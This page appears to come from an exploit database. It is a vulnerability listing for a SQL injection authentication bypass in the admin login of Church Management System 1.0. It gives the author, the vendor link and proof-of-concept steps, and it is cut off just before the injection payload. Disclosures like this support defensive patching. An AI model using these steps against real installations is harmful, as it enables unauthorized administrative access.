Church management system 1.0 password sql injection (authentication bypass) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-07-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Church management system 1.0 password sql injection (authentication bypass) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
# Proof of Concept :
1-Go to http://target.com/cman/admin
2-Write the following payload to username and admin parameter and click login.